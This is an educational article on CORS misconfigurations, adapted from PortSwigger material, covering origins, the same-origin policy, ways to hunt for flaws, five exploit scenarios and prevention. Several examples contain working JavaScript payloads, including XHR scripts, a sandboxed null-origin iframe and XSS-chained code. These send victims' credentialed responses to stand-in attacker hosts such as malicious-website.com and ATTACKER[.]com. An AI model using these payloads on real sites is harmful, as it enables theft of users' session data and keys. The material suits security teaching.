Note: The majority of this content was taken from PortSwigger's Web Security Academy, but it is not an exact copy/paste.

Table of Contents:

- What is an “Origin”?

- What is a Same Origin Policy (SOP)?

- What is CORS?

- Vulnerabilities Arising From CORS Configuration Issues

- Examples

- How to Prevent CORS-Based Attacks

What is an “Origin”?

The origin of a page is determined by three factors: protocol, hostname, and port number. For example:

- http://test.com and https://test.com have different origins because the protocol is different.

- Similarly, http://one.test.com and http://two.test.com have different origins because the hostnames are different.

- The origin also differs for two services running on the same host with different port numbers, e.g. http://test.com:8081 and http://test.com:8082 are considered to be different origins.

Here’s a table taken from Mozilla that compares several URLs against the origin of http://store.company.com/dir/page.html:

| URL | Outcome | Reason |
|---|---|---|
| http://store.company.com/dir2/other.html | Same origin | Only the path differs |
| http://store.company.com/dir/inner/another.html | Same origin | Only the path differs |
| https://store.company.com/page.html | Failure | Different protocol |
| http://store.company.com:81/dir/page.html | Failure | Different port (http:// is port 80 by default) |
| http://news.company.com/dir/page.html | Failure | Different host |
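The comparison in the table can be reproduced with the standard URL API, whose origin property serializes the protocol, hostname, and port. This is only a minimal sketch; the helper name sameOrigin is an assumption for illustration and is not part of any library.

```javascript
// Compare two URLs by origin (protocol + hostname + port).
// `sameOrigin` is a hypothetical helper name used for illustration.
function sameOrigin(a, b) {
  return new URL(a).origin === new URL(b).origin;
}

const base = 'http://store.company.com/dir/page.html';
const candidates = [
  'http://store.company.com/dir2/other.html',
  'https://store.company.com/page.html',
  'http://store.company.com:81/dir/page.html',
  'http://news.company.com/dir/page.html',
];

for (const url of candidates) {
  console.log(url, sameOrigin(base, url) ? 'same origin' : 'different origin');
}
```

Note that an explicit default port (for example :80 on an http:// URL) is dropped during parsing, so it does not change the origin.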

What is a Same Origin Policy (SOP)?

The same-origin policy (SOP) is a browser-level security control that dictates how a document or script served by one origin can interact with a resource from another origin. When a browser sends an HTTP request from one origin to another, any cookies relevant to the other domain, including authentication session cookies, are also sent as part of the request. This means that the response is generated within the user’s session and includes any data specific to that user. Without the same-origin policy, a malicious website you visited would be able to read your emails from Gmail, your private messages from Facebook, and so on.

In short, it prevents scripts running under one origin from reading data from another origin, but it does not protect against cross-origin attacks such as cross-site request forgery (CSRF), because cross-domain requests and form submissions are still permitted. This means that if you perform a CSRF attack against a vulnerable site that results in a server-side state change (e.g. user creation or document deletion), the attack will succeed, but you will not be able to read the response.

What is CORS?

Many websites interact with subdomains or third-party sites in a way that requires full cross-origin access. This created the need for a way to relax the same-origin policy and allow more flexibility about which resources can be loaded and what they can do. Cross-origin resource sharing (CORS) provides this controlled relaxation of the same-origin policy.

How Does CORS Provide Controlled Relaxation of SOP?

CORS does this through a collection of HTTP headers. Browsers permit access to responses to cross-origin requests based upon these header instructions.

The Access-Control-Allow-Origin header (ACAO) is included in the response from one website to a request originating from another website, and identifies the permitted origin of the request. A web browser compares the Access-Control-Allow-Origin with the requesting website’s origin and permits access to the response if they match.

How Do You Handle Requests with Credentials?

By default, cross-origin resource requests are sent without credentials such as cookies or the Authorization header. However, the cross-domain server can permit reading of the response when credentials are passed by setting an additional header. If the response includes Access-Control-Allow-Credentials: true, the browser will permit the requesting website to read the response. Otherwise, the browser will not allow access to the response.
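The two header checks described above can be modelled roughly as follows. This is a simplified sketch of the browser's decision, not the full CORS algorithm (it ignores preflight requests, for instance). The function name canReadResponse and the lowercase header-map shape are assumptions made for illustration.

```javascript
// Simplified model: may a page at `pageOrigin` read a cross-origin response
// that carries these headers? Header names are assumed to be lowercased.
function canReadResponse(pageOrigin, responseHeaders, withCredentials) {
  const allowOrigin = responseHeaders['access-control-allow-origin'];
  const allowCredentials = responseHeaders['access-control-allow-credentials'];

  // No ACAO header means the server has not opted in to CORS at all.
  if (allowOrigin === undefined) return false;

  if (!withCredentials) {
    // Without credentials, a wildcard or an exact origin match is enough.
    return allowOrigin === '*' || allowOrigin === pageOrigin;
  }

  // With credentials, the wildcard is not accepted and ACAC must be "true".
  return allowOrigin === pageOrigin && allowCredentials === 'true';
}

console.log(canReadResponse(
  'https://app.example',
  {
    'access-control-allow-origin': 'https://app.example',
    'access-control-allow-credentials': 'true',
  },
  true
));
```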

Vulnerabilities Arising From CORS Configuration Issues

Many modern websites use CORS to allow access from subdomains and trusted third parties. Their implementation of CORS may contain mistakes or be overly lenient to ensure that everything works, and this can result in exploitable vulnerabilities.

How Do We Hunt for this Type of Vulnerability?

















- Review the HTTP history of your requests and locate a page that returns sensitive data about your session. Review the response and look for any indication of a CORS configuration in the response headers. For example, if you see Access-Control-Allow-Credentials, this suggests that the endpoint may support CORS.

- To test how lenient the policy is, send the request to Burp Repeater and add an example origin header: Origin: https://example.com.

- Review the response and see if the origin is reflected in the Access-Control-Allow-Origin header. If it is, you may be able to exploit this with the script shown in example #1.

- If a domain like example.com doesn’t work, try setting the Origin header to null and review the response to see if the ACAO header returns null as an accepted value. See example #3.

- If neither of those works, try a subdomain of the target itself. For example, if your target is example.com, try subdomain.example.com. If you are able to find an XSS vulnerability on an allowed subdomain, you may be able to abuse CORS. See examples #4 and #5.
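The review step in the checklist above can be sketched as a small triage function that takes the Origin value you sent and the response headers you got back. The function name classifyProbe, the finding labels, and the lowercase header-map shape are all hypothetical; this is a rough aid, not a replacement for manual testing.

```javascript
// Classify one probe: `probeOrigin` is the Origin header value that was sent,
// `responseHeaders` is a map of lowercased response header names to values.
function classifyProbe(probeOrigin, responseHeaders) {
  const acao = responseHeaders['access-control-allow-origin'];
  const credentials =
    responseHeaders['access-control-allow-credentials'] === 'true';

  let finding;
  if (acao === undefined) {
    finding = 'no ACAO header';
  } else if (acao === '*') {
    finding = 'wildcard';
  } else if (acao === 'null' && probeOrigin === 'null') {
    finding = 'null origin accepted';       // see example #3
  } else if (acao === probeOrigin) {
    finding = 'probe origin accepted';      // see examples #1, #4 and #5
  } else {
    finding = 'different origin returned';
  }
  return { finding, credentials };
}

console.log(classifyProbe('https://example.com', {
  'access-control-allow-origin': 'https://example.com',
  'access-control-allow-credentials': 'true',
}));
```

A result of "probe origin accepted" together with credentials set to true for an arbitrary domain is the combination that example #1 exploits.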

Examples

Example #1: Server-generated ACAO header from client-specified Origin header

Some applications need to provide access to a number of other domains. Maintaining a list of allowed domains requires ongoing effort, and any mistakes risk breaking functionality. So some applications take the easy route of effectively allowing access from any other domain.

One way to do this is by reading the Origin header from requests and including a response header stating that the requesting origin is allowed. For example, consider the following:

Request:

GET /sensitive-victim-data HTTP/1.1

Host: vulnerable-website.com

Origin: https://malicious-website.com

Cookie: sessionid=...

Response:

HTTP/1.1 200 OK

Access-Control-Allow-Origin: https://malicious-website.com

Access-Control-Allow-Credentials: true

...

These headers state that access is allowed from the requesting domain (malicious-website.com) and that the cross-origin requests can include cookies (Access-Control-Allow-Credentials: true) and so will be processed in-session.
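To make the server-side mistake concrete, here is a minimal sketch of the kind of logic that would produce the response above. It is deliberately vulnerable and is not taken from any real framework; the function name reflectingCorsHeaders and the lowercase request-header map are assumptions for illustration.

```javascript
// Deliberately vulnerable: echoes back whatever Origin the client sent
// and also allows credentials. Do not use this pattern.
function reflectingCorsHeaders(requestHeaders) {
  const origin = requestHeaders['origin'];
  if (origin === undefined) return {};   // not a cross-origin request
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

console.log(reflectingCorsHeaders({ origin: 'https://malicious-website.com' }));
```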

Because the application reflects arbitrary origins in the Access-Control-Allow-Origin header, this means that absolutely any domain can access resources from the vulnerable domain. If the response contains any sensitive information such as an API key or CSRF token, you could retrieve this by placing the following script on your website:

<script>

var req = new XMLHttpRequest();

req.onload = reqListener;

req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);

req.withCredentials = true;

req.send();

function reqListener() {

location='//malicious-website.com/log?key='+this.responseText;

// if the above doesn't work, try: location='/log?key='+this.responseText;

};

</script>

Example #2: Errors parsing Origin headers

Some applications that support access from multiple origins do so by using a whitelist of allowed origins. When a CORS request is received, the supplied origin is compared to the whitelist. If the origin appears on the whitelist then it is reflected in the Access-Control-Allow-Origin header so that access is granted. For example, consider the following:

Request:

GET /data HTTP/1.1

Host: normal-website.com

...

Origin: https://innocent-website.com

Response: The application checks the supplied origin against its list of allowed origins and, if it is on the list, reflects the origin as follows:

HTTP/1.1 200 OK

...

Access-Control-Allow-Origin: https://innocent-website.com

Mistakes often arise when implementing CORS origin whitelists. Some organizations decide to allow access from all their subdomains (including future subdomains not yet in existence). And some applications allow access from various other organizations’ domains including their subdomains. These rules are often implemented by matching URL prefixes or suffixes, or using regular expressions. Any mistakes in the implementation can lead to access being granted to unintended external domains.

For example, suppose an application grants access to all domains ending in: normal-website.com

An attacker might be able to gain access by registering the domain: hackersnormal-website.com

Alternatively, suppose an application grants access to all domains beginning with normal-website.com

An attacker might be able to gain access using the domain: normal-website.com.evil-user.net
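The two bypasses above can be reproduced with a few lines of string matching. The sketch below contrasts flawed suffix and prefix checks with a stricter check that parses the origin first. All three function names are hypothetical, and the stricter version is only one possible approach: it still trusts every HTTPS subdomain, which is itself a trust decision.

```javascript
const TRUSTED_DOMAIN = 'normal-website.com';

// Flawed: plain suffix match on the raw Origin string.
function suffixCheck(origin) {
  return origin.endsWith(TRUSTED_DOMAIN);
}

// Flawed: plain prefix match on the raw Origin string.
function prefixCheck(origin) {
  return origin.startsWith('https://' + TRUSTED_DOMAIN);
}

// Stricter: parse the origin, require HTTPS, and match the hostname exactly
// or as a true subdomain (note the leading dot in the suffix).
function strictCheck(origin) {
  let url;
  try {
    url = new URL(origin);
  } catch {
    return false; // not a parseable URL, e.g. the literal string "null"
  }
  return url.protocol === 'https:' &&
    (url.hostname === TRUSTED_DOMAIN ||
     url.hostname.endsWith('.' + TRUSTED_DOMAIN));
}

for (const origin of [
  'https://hackersnormal-website.com',
  'https://normal-website.com.evil-user.net',
  'https://normal-website.com',
]) {
  console.log(origin, suffixCheck(origin), prefixCheck(origin), strictCheck(origin));
}
```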



Example #3: Whitelisted Null Origin Value

The specification for the Origin header supports the value null. Browsers might send the value null in the Origin header in various unusual situations:

- Cross-origin redirects.

- Requests from serialized data.

- Requests using the file: protocol.

- Sandboxed cross-origin requests.

Some applications might whitelist the null origin to support local development of the application. For example, suppose an application receives the following cross-origin request:

Request:

GET /sensitive-victim-data HTTP/1.1

Host: vulnerable-website.com

Origin: null

Response:

HTTP/1.1 200 OK

Access-Control-Allow-Origin: null

Access-Control-Allow-Credentials: true

In this situation, an attacker can use various tricks to generate a cross-origin request containing the value null in the Origin header. This will satisfy the whitelist, leading to cross-domain access. For example, this can be done using a sandboxed iframe cross-origin request of the form:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>

var req = new XMLHttpRequest();

req.onload = reqListener;

req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);

req.withCredentials = true;

req.send();

function reqListener() {

location='https://malicious-website.com/log?key='+this.responseText;

};

</script>"></iframe>

Example #4: Exploiting XSS via CORS Trust Relationships

Even “correctly” configured CORS establishes a trust relationship between two origins. If a website trusts an origin that is vulnerable to cross-site scripting (XSS), then an attacker could exploit the XSS to inject some JavaScript that uses CORS to retrieve sensitive information from the site that trusts the vulnerable application.

Consider the following scenario.

Request:

GET /api/requestApiKey HTTP/1.1

Host: vulnerable-website.com

Origin: https://subdomain.vulnerable-website.com

Cookie: sessionid=...

Response:

HTTP/1.1 200 OK

Access-Control-Allow-Origin: https://subdomain.vulnerable-website.com

Access-Control-Allow-Credentials: true

In this case, an attacker who finds an XSS vulnerability on subdomain.vulnerable-website.com could use that to retrieve the API key, using a URL like: https://subdomain.vulnerable-website.com/?xss=<script>cors-stuff-here</script>

An example of what this might look like is as follows:

<script>

document.location="http://SUBDOMAIN.sensitive-vulnerable[.]com/?productId=VULNERABLE-XSS<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://sensitive-vulnerable[.]com',true); req.withCredentials = true;req.send();function reqListener() {location='https://ATTACKER[.]com/log?key='%2bthis.responseText; };%3c/script>"

</script>





Example #5: Breaking TLS with Poorly Configured CORS

Suppose an application that rigorously employs HTTPS also whitelists a trusted subdomain that is using plain HTTP. For example:

Request:

GET /api/requestApiKey HTTP/1.1

Host: vulnerable-website.com

Origin: http://trusted-subdomain.vulnerable-website.com

Cookie: sessionid=...

Response:

HTTP/1.1 200 OK

Access-Control-Allow-Origin: http://trusted-subdomain.vulnerable-website.com

Access-Control-Allow-Credentials: true

In this situation, an attacker who is in a position to intercept a victim user’s traffic can exploit the CORS configuration to compromise the victim’s interaction with the application. This attack involves the following steps:

- The victim user makes any plain HTTP request.

- The attacker injects a redirection to: http://trusted-subdomain.vulnerable-website.com

- The victim’s browser follows the redirect.

- The attacker intercepts the plain HTTP request, and returns a spoofed response containing a CORS request to: https://vulnerable-website.com

- The victim’s browser makes the CORS request, including the origin: http://trusted-subdomain.vulnerable-website.com

- The application allows the request because this is a whitelisted origin. The requested sensitive data is returned in the response.

- The attacker’s spoofed page can read the sensitive data and transmit it to any domain under the attacker’s control.

This attack is effective even if the vulnerable website is otherwise robust in its usage of HTTPS, with no HTTP endpoint and all cookies flagged as secure.

An example of what this might look like is as follows:

<script>

document.location="http://SUBDOMAIN.sensitive-vulnerable[.]com/?productId=VULNERABLE-XSS<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://sensitive-vulnerable[.]com',true); req.withCredentials = true;req.send();function reqListener() {location='https://ATTACKER[.]com/log?key='%2bthis.responseText; };%3c/script>"

</script>
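One way to catch the misconfiguration described in this example is to audit the whitelist for entries that are not served over HTTPS. The following is a minimal sketch, assuming the whitelist is available as an array of origin strings; the function name insecureOrigins is hypothetical.

```javascript
// Return every whitelist entry whose protocol is not HTTPS.
function insecureOrigins(whitelist) {
  return whitelist.filter((origin) => new URL(origin).protocol !== 'https:');
}

const whitelist = [
  'https://vulnerable-website.com',
  'http://trusted-subdomain.vulnerable-website.com',
];

// Logs the plain-HTTP entry that would enable the attack described above.
console.log(insecureOrigins(whitelist));
```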

How to Prevent CORS-Based Attacks

CORS vulnerabilities arise primarily as misconfigurations. Prevention is therefore a configuration problem.

Proper configuration of cross-origin requests. If a web resource contains sensitive information, the origin should be properly specified in the Access-Control-Allow-Origin header.

Only allow trusted sites. It may seem obvious but origins specified in the Access-Control-Allow-Origin header should only be sites that are trusted. In particular, dynamically reflecting origins from cross-origin requests without validation is readily exploitable and should be avoided.

Avoid whitelisting null. Avoid using the header Access-Control-Allow-Origin: null. Cross-origin resource calls from internal documents and sandboxed requests can specify the null origin. CORS headers should be properly defined in respect of trusted origins for private and public servers.

Avoid wildcards in internal networks. Trusting network configuration alone to protect internal resources is not sufficient when internal browsers can access untrusted external domains.

CORS is not a substitute for server-side security policies. CORS defines browser behaviors and is never a replacement for server-side protection of sensitive data – an attacker can directly forge a request from any trusted origin. Therefore, web servers should continue to apply protections over sensitive data, such as authentication and session management, in addition to properly configured CORS.
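The advice above about trusted origins and null can be sketched as an exact-match allowlist. This is an illustrative sketch under stated assumptions, not a complete CORS implementation: the origins in ALLOWED_ORIGINS and the function name corsHeadersFor are hypothetical, and the Vary: Origin header is an addition not mentioned in the text above, included so that caches keep responses for different origins apart.

```javascript
// Hypothetical allowlist: exact origin strings only, never "null" or "*".
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com',
]);

// Build CORS response headers for a request with the given Origin value.
function corsHeadersFor(requestOrigin) {
  // Signal to caches that the response depends on the request's Origin.
  const headers = { 'Vary': 'Origin' };
  if (requestOrigin !== undefined && ALLOWED_ORIGINS.has(requestOrigin)) {
    headers['Access-Control-Allow-Origin'] = requestOrigin;
    headers['Access-Control-Allow-Credentials'] = 'true';
  }
  return headers;
}

console.log(corsHeadersFor('https://app.example.com'));
console.log(corsHeadersFor('null'));
```

Because the lookup is an exact string match against a fixed set, lookalike domains, the null origin, and plain-HTTP variants of trusted hosts receive no CORS headers. The endpoint itself should still enforce authentication and authorization on every request.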